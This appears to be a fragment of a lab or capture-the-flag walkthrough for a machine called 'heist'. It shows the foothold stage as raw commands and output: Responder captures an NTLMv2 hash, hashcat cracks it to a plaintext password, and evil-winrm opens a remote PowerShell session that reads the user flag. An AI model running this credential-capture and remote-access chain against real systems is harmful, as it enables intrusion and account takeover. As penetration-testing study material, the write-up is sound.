Foothold

$ sudo responder -I tun0
$ hashcat -m 5600 enox.hash ~/rockyou.txt -O
enox:california
$ netexec winrm 192.168.241.165 -u 'enox' -p 'california'
$ evil-winrm -u enox -p california -i 192.168.241.165
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enox\Documents> whoami; type C:\Users\enox\Desktop\local.txt;ipconfig
heist\enox
97c936085d69f024b40f6158385e4594

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::bc21:839e:775:80d3%7
   IPv4 Address. . . . . . . . . . . : 192.168.241.165
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.241.254
*Evil-WinRM* PS C:\Users\enox\Documents> 
